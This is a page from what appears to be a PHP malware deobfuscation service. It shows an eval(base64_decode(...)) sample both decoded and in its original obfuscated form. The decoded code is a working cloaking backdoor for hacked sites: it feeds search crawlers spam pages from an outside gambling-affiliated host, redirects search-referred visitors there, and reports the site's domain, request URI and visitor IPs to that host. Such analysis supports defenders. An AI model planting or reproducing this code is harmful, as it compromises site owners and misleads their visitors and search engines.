Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('c2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmRlZmluZSgn..

Decoded Output download

set_time_limit(0);
error_reporting(0);

define('VERSION', 'ZKDNA');
define('APIVERSION', 'VEgjS21n');
define('API', base64_decode('aHR0cHM6Ly9hbWJraW5nMzY1LmNvbS8='));
define('API_HTTP', base64_decode('aHR0cDovL2FtYmtpbmczNjUuY29tLw=='));
define('API2', '');
define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2FtYmtpbmczNjUuY29tLyI7PC9zY3JpcHQ+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8aDE+Tm90IEZvdW5kPC9oMT4KICAgIDwvYm9keT4KPC9odG1sPgo='));

$req_ref = $_SERVER["HTTP_REFERER"];
$req_ua = $_SERVER["HTTP_USER_AGENT"];
$host = $_SERVER['HTTP_HOST'];
$req_uri = $_SERVER['REQUEST_URI'];

function fetch_prefix() {

}

function insert_html() {
	ob_start();
	register_shutdown_function('insert_html_end');
}

function insert_html_end() {
    $output = ob_get_contents();
    ob_end_clean();
}

function is_prefix($uri, $prefix_regex='/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|zop|xsn|xiazai|vna|soft|rna|qsj|muv|iphone|gov|edu|apk|wp-news|uri|bak|start|gaming|sport|football|bull|ID)./i') {
	return preg_match($prefix_regex, $uri) === 1;
}

function is_crawler($ua) {
    $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
	foreach ($crawlers as $c) {
		if (stripos($ua, $c) !== false) {
			return true;
		}
	}
	return false;
}

function is_visitor($ref) {
	if (substr($ref, 0, 4) === 'http') {
        $refs = array('google.', 'bing.', 'yahoo.');
		foreach ($refs as $r) {
			if (stripos($ref, $r) !== false) {
				return true;
			}
		}
	}
	return false;
}

function get_content($url, $headers=array(), $conn_timeout=0, $trans_timeout=0) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
		curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
		curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $result = curl_exec($ch);
		if(curl_errno($ch)){
			$result = NULL;
		}
        curl_close($ch);
        return $result;
    }
	else {
        return file_get_contents($url);
    }
}
function get_client_ip(){
    foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key){
        if (array_key_exists($key, $_SERVER) === true){
            foreach (explode(',', $_SERVER[$key]) as $ip){
                $ip = trim($ip);
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false){
                    return $ip;
                }
            }
        }
    }
}

function main() {
	global $req_ref, $req_ua, $host, $req_uri;
	header('Cache-Control: no-store, no-cache, must-revalidate');
	header('Cache-Control: post-check=0, pre-check=0', FALSE);
	header('Pragma: no-cache');
	$uri_encoded = urlencode($req_uri);
	$headers = array();
	if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
		$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
		array_push($headers, "Accept-Language: $lang");
		array_push($headers, "Vary: Accept-Language");
	}
	if (is_crawler($req_ua)) {
		$crawler_ip = get_client_ip();
		if (is_prefix($req_uri)) {
			header('Content-Type:text/html; charset=utf-8');
			echo get_content(API_HTTP. "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers);
			exit;
		}
		else {
			echo get_content(API_HTTP. "friends.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION);
		}
	}
	elseif (is_prefix($req_uri) && is_visitor($req_ref)) {
		header('Content-Type:text/html; charset=utf-8');
		$client_ip = get_client_ip();
		$allheaders = array();
		if (!function_exists('getallheaders')) {
			function getallheaders() {
			$tmp_headers = array();
			foreach ($_SERVER as $name => $value) {
				if (substr($name, 0, 5) == 'HTTP_') {
					$tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
				}
			}
			return $tmp_headers;
			}
			$allheaders = getallheaders();
		}
		else {
			$allheaders = getallheaders();
		}
		foreach ($allheaders as $key => $value) {
			if (stripos($key, 'Sec-') === 0) {
				array_push($headers, "$key: $value");
			}
		}

		$html = get_content(API_HTTP. "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3);
		echo ($html? $html: FALLBACK_REDIRECT_HTML);
		exit;
	}
}
main();

Did this file decode correctly?

Original Code

<?php eval(base64_decode('c2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmRlZmluZSgnVkVSU0lPTicsICdaS0ROQScpOwpkZWZpbmUoJ0FQSVZFUlNJT04nLCAnVkVnalMyMW4nKTsKZGVmaW5lKCdBUEknLCBiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OWhiV0pyYVc1bk16WTFMbU52YlM4PScpKTsKZGVmaW5lKCdBUElfSFRUUCcsIGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92TDJGdFltdHBibWN6TmpVdVkyOXRMdz09JykpOwpkZWZpbmUoJ0FQSTInLCAnJyk7CmRlZmluZSgnRkFMTEJBQ0tfUkVESVJFQ1RfSFRNTCcsIGJhc2U2NF9kZWNvZGUoJ1BHaDBiV3crQ2lBZ0lDQThhR1ZoWkQ0S0lDQWdJQ0FnSUNBOGRHbDBiR1UrVkdobElISmxjMjkxY21ObElHTmhibTV2ZENCaVpTQm1iM1Z1WkM0OEwzUnBkR3hsUGdvZ0lDQWdJQ0FnSUR4elkzSnBjSFErZDJsdVpHOTNMbXh2WTJGMGFXOXVQU0pvZEhSd2N6b3ZMMkZ0WW10cGJtY3pOalV1WTI5dEx5STdQQzl6WTNKcGNIUStDaUFnSUNBOEwyaGxZV1ErQ2lBZ0lDQThZbTlrZVQ0S0lDQWdJQ0FnSUNBOGFERStUbTkwSUVadmRXNWtQQzlvTVQ0S0lDQWdJRHd2WW05a2VUNEtQQzlvZEcxc1Bnbz0nKSk7CgokcmVxX3JlZiA9ICRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTsKJHJlcV91YSA9ICRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJGhvc3QgPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ107CiRyZXFfdXJpID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CgpmdW5jdGlvbiBmZXRjaF9wcmVmaXgoKSB7Cgp9CgpmdW5jdGlvbiBpbnNlcnRfaHRtbCgpIHsKCW9iX3N0YXJ0KCk7CglyZWdpc3Rlcl9zaHV0ZG93bl9mdW5jdGlvbignaW5zZXJ0X2h0bWxfZW5kJyk7Cn0KCmZ1bmN0aW9uIGluc2VydF9odG1sX2VuZCgpIHsKICAgICRvdXRwdXQgPSBvYl9nZXRfY29udGVudHMoKTsKICAgIG9iX2VuZF9jbGVhbigpOwp9CgpmdW5jdGlvbiBpc19wcmVmaXgoJHVyaSwgJHByZWZpeF9yZWdleD0nL1s/XC9dKGFwcHxpb3N8YW5kcm9pZHxkb3dubG9hZHxibGFua3xiZXR8Y2FzaW5vfGdhbWVzfHBsYXl8dmlkZW98cG9rZXJ8cm9vdHxuZXdzfHBhdHR8dGVlfHN0b3xiZWF8c2xvfGJhY3xwYWN8dGlnfGJtd3xmcnV8YnVsbHxjYXJkfGdvZHN8ZmlzaHxtYWhqfHpvcHx4c258eGlhemFpfHZuYXxzb2Z0fHJuYXxxc2p8bXV2fGlwaG9uZXxnb3Z8ZWR1fGFwa3x3cC1uZXdzfHVyaXxiYWt8c3RhcnR8Z2FtaW5nfHNwb3J0fGZvb3RiYWxsfGJ1bGx8SUQpLi9pJykgewoJcmV0dXJuIHByZWdfbWF0Y2goJHByZWZpeF9yZWdleCwgJHVyaSkgPT09IDE7Cn0KCmZ1bmN0aW9uIGlzX2NyYXdsZXIoJHVhKSB7CiAgICAkY3Jhd2xlcnMgPSBhcnJheSgnR29vZ2xlYm90JywgJ0Jpbmdib3QnLCAnTVNOQk9UJywgJ1lhaG9vIScpOwoJZm9yZWFjaCAoJGNyYXdsZXJzIGFzICRjKSB7CgkJaWYgKHN0cmlwb3MoJHVhLCAkYykgIT09IGZhbHNlKSB7CgkJCXJldHVybiB0cnVlOwoJCX0KCX0KCXJldHVybiBmYWxzZTsKfQoKZnVuY3Rpb24gaXNfdmlzaXRvcigkcmVmKSB7CglpZiAoc3Vic3RyKCRyZWYsIDAsIDQpID09PSAnaHR0cCcpIHsKICAgICAgICAkcmVmcyA9IGFycmF5KCdnb29nbGUuJywgJ2JpbmcuJywgJ3lhaG9vLicpOwoJCWZvcmVhY2ggKCRyZWZzIGFzICRyKSB7CgkJCWlmIChzdHJpcG9zKCRyZWYsICRyKSAhPT0gZmFsc2UpIHsKCQkJCXJldHVybiB0cnVlOwoJCQl9CgkJfQoJfQoJcmV0dXJuIGZhbHNlOwp9CgpmdW5jdGlvbiBnZXRfY29udGVudCgkdXJsLCAkaGVhZGVycz1hcnJheSgpLCAkY29ubl90aW1lb3V0PTAsICR0cmFuc190aW1lb3V0PTApIHsKICAgIGlmIChmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpKSB7CiAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKCQljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOwoJCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl0pOwoJCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IVFRQSEVBREVSLCAkaGVhZGVycyk7CgkJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAkY29ubl90aW1lb3V0KTsKCQljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgJHRyYW5zX3RpbWVvdXQpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOwoJICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgdHJ1ZSk7CiAgICAgICAgJHJlc3VsdCA9IGN1cmxfZXhlYygkY2gpOwoJCWlmKGN1cmxfZXJybm8oJGNoKSl7CgkJCSRyZXN1bHQgPSBOVUxMOwoJCX0KICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgICAgcmV0dXJuICRyZXN1bHQ7CiAgICB9CgllbHNlIHsKICAgICAgICByZXR1cm4gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CiAgICB9Cn0KZnVuY3Rpb24gZ2V0X2NsaWVudF9pcCgpewogICAgZm9yZWFjaCAoYXJyYXkoJ0hUVFBfQ0xJRU5UX0lQJywgJ0hUVFBfWF9SRUFMX0lQJywgJ0hUVFBfQ0ZfQ09OTkVDVElOR19JUCcsICdIVFRQX1hfRk9SV0FSREVEX0ZPUicsICdIVFRQX1hfRk9SV0FSREVEJywgJ0hUVFBfWF9DTFVTVEVSX0NMSUVOVF9JUCcsICdIVFRQX0ZPUldBUkRFRF9GT1InLCAnSFRUUF9GT1JXQVJERUQnLCAnUkVNT1RFX0FERFInKSBhcyAka2V5KXsKICAgICAgICBpZiAoYXJyYXlfa2V5X2V4aXN0cygka2V5LCAkX1NFUlZFUikgPT09IHRydWUpewogICAgICAgICAgICBmb3JlYWNoIChleHBsb2RlKCcsJywgJF9TRVJWRVJbJGtleV0pIGFzICRpcCl7CiAgICAgICAgICAgICAgICAkaXAgPSB0cmltKCRpcCk7CiAgICAgICAgICAgICAgICBpZiAoZmlsdGVyX3ZhcigkaXAsIEZJTFRFUl9WQUxJREFURV9JUCwgRklMVEVSX0ZMQUdfTk9fUFJJVl9SQU5HRSB8IEZJTFRFUl9GTEFHX05PX1JFU19SQU5HRSkgIT09IGZhbHNlKXsKICAgICAgICAgICAgICAgICAgICByZXR1cm4gJGlwOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQp9CgpmdW5jdGlvbiBtYWluKCkgewoJZ2xvYmFsICRyZXFfcmVmLCAkcmVxX3VhLCAkaG9zdCwgJHJlcV91cmk7CgloZWFkZXIoJ0NhY2hlLUNvbnRyb2w6IG5vLXN0b3JlLCBuby1jYWNoZSwgbXVzdC1yZXZhbGlkYXRlJyk7CgloZWFkZXIoJ0NhY2hlLUNvbnRyb2w6IHBvc3QtY2hlY2s9MCwgcHJlLWNoZWNrPTAnLCBGQUxTRSk7CgloZWFkZXIoJ1ByYWdtYTogbm8tY2FjaGUnKTsKCSR1cmlfZW5jb2RlZCA9IHVybGVuY29kZSgkcmVxX3VyaSk7CgkkaGVhZGVycyA9IGFycmF5KCk7CglpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pKSB7CgkJJGxhbmcgPSAkX1NFUlZFUlsnSFRUUF9BQ0NFUFRfTEFOR1VBR0UnXTsKCQlhcnJheV9wdXNoKCRoZWFkZXJzLCAiQWNjZXB0LUxhbmd1YWdlOiAkbGFuZyIpOwoJCWFycmF5X3B1c2goJGhlYWRlcnMsICJWYXJ5OiBBY2NlcHQtTGFuZ3VhZ2UiKTsKCX0KCWlmIChpc19jcmF3bGVyKCRyZXFfdWEpKSB7CgkJJGNyYXdsZXJfaXAgPSBnZXRfY2xpZW50X2lwKCk7CgkJaWYgKGlzX3ByZWZpeCgkcmVxX3VyaSkpIHsKCQkJaGVhZGVyKCdDb250ZW50LVR5cGU6dGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Jyk7CgkJCWVjaG8gZ2V0X2NvbnRlbnQoQVBJX0hUVFAuICJjb25uZWN0b3IuaHRtbD9kb21haW49eyRob3N0fSZ1cmk9eyR1cmlfZW5jb2RlZH0maXA9eyRjcmF3bGVyX2lwfSZ2ZXI9IiAuIFZFUlNJT04gLiAiJnY9IiAuIEFQSVZFUlNJT04sICRoZWFkZXJzKTsKCQkJZXhpdDsKCQl9CgkJZWxzZSB7CgkJCWVjaG8gZ2V0X2NvbnRlbnQoQVBJX0hUVFAuICJmcmllbmRzLmh0bWw/ZG9tYWluPXskaG9zdH0mdXJpPXskdXJpX2VuY29kZWR9JmlwPXskY3Jhd2xlcl9pcH0mdmVyPSIgLiBWRVJTSU9OIC4gIiZ2PSIgLiBBUElWRVJTSU9OKTsKCQl9Cgl9CgllbHNlaWYgKGlzX3ByZWZpeCgkcmVxX3VyaSkgJiYgaXNfdmlzaXRvcigkcmVxX3JlZikpIHsKCQloZWFkZXIoJ0NvbnRlbnQtVHlwZTp0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgnKTsKCQkkY2xpZW50X2lwID0gZ2V0X2NsaWVudF9pcCgpOwoJCSRhbGxoZWFkZXJzID0gYXJyYXkoKTsKCQlpZiAoIWZ1bmN0aW9uX2V4aXN0cygnZ2V0YWxsaGVhZGVycycpKSB7CgkJCWZ1bmN0aW9uIGdldGFsbGhlYWRlcnMoKSB7CgkJCSR0bXBfaGVhZGVycyA9IGFycmF5KCk7CgkJCWZvcmVhY2ggKCRfU0VSVkVSIGFzICRuYW1lID0+ICR2YWx1ZSkgewoJCQkJaWYgKHN1YnN0cigkbmFtZSwgMCwgNSkgPT0gJ0hUVFBfJykgewoJCQkJCSR0bXBfaGVhZGVyc1tzdHJfcmVwbGFjZSgnICcsICctJywgdWN3b3JkcyhzdHJ0b2xvd2VyKHN0cl9yZXBsYWNlKCdfJywgJyAnLCBzdWJzdHIoJG5hbWUsIDUpKSkpKV0gPSAkdmFsdWU7CgkJCQl9CgkJCX0KCQkJcmV0dXJuICR0bXBfaGVhZGVyczsKCQkJfQoJCQkkYWxsaGVhZGVycyA9IGdldGFsbGhlYWRlcnMoKTsKCQl9CgkJZWxzZSB7CgkJCSRhbGxoZWFkZXJzID0gZ2V0YWxsaGVhZGVycygpOwoJCX0KCQlmb3JlYWNoICgkYWxsaGVhZGVycyBhcyAka2V5ID0+ICR2YWx1ZSkgewoJCQlpZiAoc3RyaXBvcygka2V5LCAnU2VjLScpID09PSAwKSB7CgkJCQlhcnJheV9wdXNoKCRoZWFkZXJzLCAiJGtleTogJHZhbHVlIik7CgkJCX0KCQl9CgoJCSRodG1sID0gZ2V0X2NvbnRlbnQoQVBJX0hUVFAuICJyZWRpcmVjdHYxLmh0bWw/ZG9tYWluPXskaG9zdH0mdXJpPXskdXJpX2VuY29kZWR9JmlwPXskY2xpZW50X2lwfSZ2ZXI9IiAuIFZFUlNJT04gLiAiJnY9IiAuIEFQSVZFUlNJT04sICRoZWFkZXJzLCAzLCAzKTsKCQllY2hvICgkaHRtbD8gJGh0bWw6IEZBTExCQUNLX1JFRElSRUNUX0hUTUwpOwoJCWV4aXQ7Cgl9Cn0KbWFpbigpOw=='));?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 2cd3ee3ceb340ff093d649ce3247a10b
Eval Count 1
Decode Time 62 ms